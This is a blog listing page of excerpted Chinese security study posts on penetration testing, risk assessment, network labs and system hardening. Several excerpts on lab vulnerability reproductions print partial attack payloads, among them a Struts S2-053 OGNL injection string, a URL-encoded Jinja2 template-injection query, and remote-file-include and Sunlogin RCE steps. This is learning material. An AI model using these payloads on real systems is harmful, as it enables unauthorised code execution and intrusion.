自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(30)
  • 收藏
  • 关注

原创 网络安全---渗透测试

渗透测试是一种评估计算机网络系统安全的方法,通过模拟恶意黑客的攻击方法来发现系统的弱点、技术缺陷或漏洞。渗透测试的目的是为了识别和评估潜在的安全风险,从而帮助组织采取措施防止黑客攻击,保护数据安全。渗透测试的流程主要包括确定测试目标、收集信息、需求分析和漏洞扫描、漏洞利用、物理访问测试、测试结果分析等步骤。

2024-02-29 16:41:10 910

原创 论风险评估

风险评估是一个系统的过程,旨在识别、分析和评估潜在的威胁,以制定有效的风险管理策略来应对这些风险。风险评估的目的是为了识别和评估风险并制定相关计划,从而最大程度降低或控制这些风险及其对企业造成的潜在影响。在进行风险评估时,可以采用多种操作方法,如基于知识的分析方法、基于模型的分析方法、定性方法等。风险因素分析法作为一种常用的风险评估方法,通过调查风险源、识别风险转化条件、确定转化条件是否具备、估计风险发生的后果等步骤来确定风险发生概率的大小。

2024-02-29 16:29:25 897

原创 浅谈风险评估

按照评估的方法,可以将风险评估分为定性评估和定量评估。总之,风险评估是企业或组织信息安全管理的重要组成部分,通过科学、客观、全面的风险评估,可以识别潜在的安全风险和漏洞,制定相应的安全措施和管理策略,提高网络安全水平和风险抵御能力,从而确保企业或组织的信息安全和业务连续性。风险评估是网络安全管理中的一项重要工作,它可以帮助企业或组织识别潜在的安全风险和漏洞,提高网络安全水平和抵御风险的能力,促进网络安全管理和发展,满足法律法规和行业标准的要求,为企业或组织的可持续发展提供保障。为什么需要进行风险评估呢?

2023-06-06 10:39:00 503

原创 等保测评简单介绍

风险评估原理:等保测评是一项基于风险评估的过程,其目的是评估企业和组织的网络安全水平,识别潜在的安全风险和漏洞,并为制定相应的安全措施和管理策略提供参考。总之,等保测评是企业和组织的一项重要网络安全管理工作,有助于提高网络安全水平和抵御风险的能力,促进网络安全管理和发展,满足法律法规和行业标准的要求,为企业或组织的可持续发展提供保障。提高网络安全水平和抵御风险的能力:等保测评可以帮助企业或组织了解自身的网络安全水平和存在的问题,制定相应的安全保护措施和管理策略,提高网络安全水平和抵御风险的能力。

2023-06-06 10:31:46 867

原创 浅谈数据库

总之,数据库作为存储、管理和处理数据的重要工具,不仅在传统的企业应用中得到广泛应用,也在新兴的互联网应用中扮演着重要的角色。列(Column)是表格的属性,行(Row)则是表格的记录。数据库管理员(Database Administrator,DBA):负责数据库的设计、建模、安装、配置、维护和监控等工作,确保数据库的正常运行和安全性。数据安全分析师(Data Security Analyst):负责对数据库中的数据进行分析和审计,检测异常行为和潜在的安全威胁,并提出相应的解决方案。

2023-06-06 10:23:11 120

原创 S2-053远程代码执行漏洞

docker-compose up -dhttp://ip:8080/hello.actionPayload:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInsta...

2022-03-18 14:24:26 308

原创 Flask(Jinja2) 服务端模板注入漏洞

cd vulhub-mastercd flask/ssti编译及运行测试环境:docker-compose builddocker-compose up -d访问http://your-ip:8000再访问http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__...

2022-03-18 09:47:22 144

原创 Spring远程代码执行漏洞(CVE-2017-4971)

运行测试环境:docker-compose up -d等待环境启动后,访问http://ip:8080,将看到一个酒店预订的页面首先访问http://ip:8080/login,用页面左边给出的任意一个账号/密码登录系统:然后访问id为1的酒店http://ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了):再点击确认“Confirm”:进行抓包...

2022-03-17 20:53:29 709

原创 bWAPP实验

首先登陆靶场找到ssrf点击hack点击选框出现代码后复制然后在网站根目录下建立一个1.txt,把代码粘贴后保存。回到页面点击bugs找到RFI/LFI后点击hack。点击Go之后打开HackBar把lang_en.php修改为http://192.168.5.35(本机IP)/1.txt,然后勾选post data,输入ip=192.168.5.35出现后点击确定查看。实验结束。...

2022-03-07 20:43:51 168

原创 DVWA 高级暴力破解

暴力破解dvwa用burp抓包右键intruder进入后依次选中密码和token值添$(点击Add即可)再点击Resource Pool在下面设置值为1下一步

2022-03-07 16:09:57 334

原创 向日葵RCE复现

本次实验在虚拟机上安装向日葵,用本机nmap进行扫描虚拟机上的向日葵版本要符合:向日葵个人版 for Windows <= 11.0.0.33向日葵简约版 <= V1.0.1.43315(2021.12)在虚拟机上打开向日葵然后在本机上用nmap扫描(扫描的为虚拟机ip)然后用浏览器一个个的尝试访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)有了CID然后进行添加到payload和coo...

2022-02-28 20:59:48 7069

原创 文 件 包 含

什么是文件包含?下图很好的表达了"文件包含"的含义,图1中(a)为文件f1.c,它有一个#include “f2.c”命令,后面跟着文件内容,记为程序1.图1中(b)为另一个文件f2.c,文件内容以程序2表示。在预编译时,对要#include命令进行"文件包含"处理,将f2.c的全部内容复制插入到#include “f2.c” 命令处,即f2.c被包含到f1.c中,得到如图1中(c)所示的结果。在编译时,将"包含"以后的f1.c(如图1中(c))作为一个源文件进行编译处理。文件包含:开发人员通常

2022-02-28 20:27:27 283

原创 Tomcat任意文件上传

首先,我们要部署一下Vulfocus(Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用)我们先拉去vulfocus镜像docker pull vulfocus/vulfocus:latest运行命令docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=x.x.x.xvulfocus/vulfocus(端口可更改,防止已被占用)部署好的登录界面如下..

2022-02-24 20:48:49 362

原创 SQL1~5关

SQL右键打开检查,进入到Hackbar插件,在里面输入

2022-02-24 19:56:53 4015

原创 SQL注入-SQL数据库操作基础

一、MySQL(MariaDB)基础操作1.连接数据库输入命令:mysql -u root -p出现enter password:提示,由于root密码为空,可直接回车登录出现下图2.显示系统中所有数据库的名称接着输入:show databases;注意:绝大多数SQL命令都以分号作为结束符,请不要遗漏。3.新建数据库student命令:create databse student;建立成功后,可再次使用show databases;命令查询。..

2022-02-13 18:12:45 1050

原创 渗透之信息收集

一、御剑1.掌握御剑工具目录扫描工具使用,并爬取目标网站目录结构;御剑打开界面:我们使用御剑扫描器,主要是扫描网站敏感目录,包括网站后台等。其扫描原理也是爆破,即通过敏感目录的字典去匹配。 御剑后台扫描之前,爬虫会访问robots txt文件。二、使用Nmap和Wafw00f对指定目标资产的类别和版本进行识别1.登陆靶机,手动启动本地网卡。使用命令ifup ens18,并且使用ifconfig命令查看获取的ip地址。(1)Nmap登录kali主机,在终端中使.

2022-01-18 22:08:47 427

原创 C 段扫描

实验目的:通过使用常见的扫描工具,对C段资产信息扫描和收集。实验环境:操作机:kali靶机:虚拟机windows7实验原理:通过使用Nmap、Masscan工具,对制定目标信息的探测实验步骤;登录靶机查看IP地址然后进入kali终端输入nmap -sn -PE -n 192.168.190.136/24 -oX out.htmlkali桌面生成...

2022-01-16 22:14:30 2971

原创 子域名收集

实验步骤子域名爆破工具安装爆破工具登录kali终端输出命令:git clone https://github.com/lijiejie/subDomainsBrute下载子域名爆破工具subDomainsBrute2.增加执行权限进入工具的文件夹,使用命令chomd+xsubDomainsBrute给执行脚本程序赋予执行权限。由此图可见,已成功给脚本文件增加执行权限。3.使用工具,检查对应的域名存在的子域名注意:禁止对非授权域名进行探测,爆...

2022-01-16 21:03:47 2410

原创 DNS信息查询综合实验

一、Whois利用相关命令进行针对域名的信息收集。首先确认目标,例如baidu.com.cn 本次实验需要对目标下的域名、IP进行收集。使用whois命令对该域名进行查询:whois sangforedu.com.cn这里我们又发现了一个新的域名:sangfor.com.cn其中比较重要的有邮件、电话号码、姓名,在后期社会工程学攻击中可能用到。通过查询的邮箱,在利用站长之家网站提供的几个域名反侦查工具进一步查询:发现了新的域名:gbasic.cn、secure...

2022-01-16 20:13:20 2138

原创 渗透测试工具Nmap

Nmap介绍:是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一。最新版的Nmap6.0在2012年5月21日发布,详情请参见:www.nmap.org。一般情况下,Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是

2022-01-14 19:20:17 698

原创 BurpSuite

一、burpsuite安装与配置1.简介:Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。2.安装实例---在windows7中安装burpsuite专业版(1)下载、安装Java环境(2)设置Java环境变量(3)下载burpsuite程序包(.jar)破解并启动burpsuite por步骤1:安

2022-01-13 21:55:04 6788

原创 单臂路由实验

PC1:PC2PC3PC4sw1v b 10 20int e0/0/1port link-type accessport default vlan 10int e0/0/2port link-type accessport default vlan 10int e0/0/3port link-type accessport default vlan 20int e0/0/4port link-type accessport def...

2021-12-29 21:07:09 1044

原创 路由交换实验

1.实验一R1sysospf router-id 1.1.1.1area 0network 192.168.1.2 0.0.0.0network 192.168.2.1 0.0.0.0R2sysospf router-id 2.2.2.2area 0.0.0.0network 192.168.2.2 0.0.0.0network 192.168.3.1 0.0.0.0area 0.0.0.2network 192.168.6.1 0.0.0.0R3sysos.

2021-12-23 19:40:41 523

原创 ——路由基础——

一、什么是路由: (1).路由是指导报文转发的路径信息,通过路由可以确认转发IP报文的路径。 (2).路由设备是依据路由转发报文到目的网段的网络设备,最常见的路由设备:路由器。 (3).路由设备维护着一张路由表,保存着路由信息。路由中包含以下信息: (1)目的网络:标识目的网段 (2) 掩码:与目的地址共同标识一个网段 (3)出接口:路由包被路由后离开本路由器的接口 (4)下一跳:路由器转...

2021-12-21 21:29:47 673

原创 TCP/IP协议和OSI七层模型

一、TCP/IP协议标准TCP/IP协议是用于计算机通信的一组协议,通常被称为TCP/IP协议栈,以它为基础组建的互联网是目前国际上规模最大的计算机网络。正因为互联网的广泛应用,使得TCP/IP成为了事实上的网络标准。TCP/IP传输协议,即传输控制/网络协议,也叫作网络通讯协议。它是在网络的使用中的最基本的通信协议。TCP/IP传输协议对互联网中各部分进行通信的标准和方法进行了规定。并且,TCP/IP传输协议是保证网络数据信息及时、完整传输的两个重要的协议。TCP/IP传输协议是严格来说是

2021-12-20 19:20:15 7058

原创 基线管理之apache安全配置

查看apache配置文件,确定里面对根目录是拒绝所有请求​按箭头,下翻可以找到以下配置​其中,第一行和第四行,指明了目录,即Linux的根目录 /第二行,表示禁止使用.htaccess文件,覆盖此处配置第三行,表示禁止访问根目录二、删除网站的目录浏览权限apache会在默认路径下开启目录浏览继续查看apache配置文件,找到如下,其中Indexes即为目录浏览权限,直接删除掉即可。​三、限制HTTP方法apache默认没有限制限制h...

2021-12-20 17:37:09 63

原创 基线管理之Centos安全配置

一、网络配置1、检查不用的连接使用以下命令ip link show up如下图,发现有两个连接一个为lo,一个为eth0,如果有需要关闭的接口,可以使用ip link setdown​2、关闭IP转发先查看ip转发配置sysctl net.ipv4.ip_forward​查看发现为0,如果是1,可以使用下面命令改为0sysctl -w net.ipv4.ip_forward=03、关闭数据包重定向查看数据包重定向设置sysctl n...

2021-12-15 19:23:32 115

原创 基线管理之Windows安全配置

一、登录服务器,打开组策略1.点击开始(win)右键点击运行输入 gpedit.msc 点击确定

2021-12-15 19:09:25 2054

原创 Windows主机加固

禁用Gest账户和其他无关账户控制面板---管理工具---计算机管理---本地用户和组---用户---Gest---【账户已禁用】打开启用密码策略加强控制面板---管理工具---本地安全策略---账户搭建---密码策略例如...

2021-12-09 20:02:58 401

原创 Windows基础

Win+r键并且输入cmd 弹出dos系统界面输入Dir //列出所有文件输入Cd //进入某一个目录输入Cd .. //返回上一个目录输入Dir /a //显示出全部目录cd //改变目录文件夹有空格,需要双引号没有空格,不需要引号输入D: //切换...

2021-12-09 19:01:42 266

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除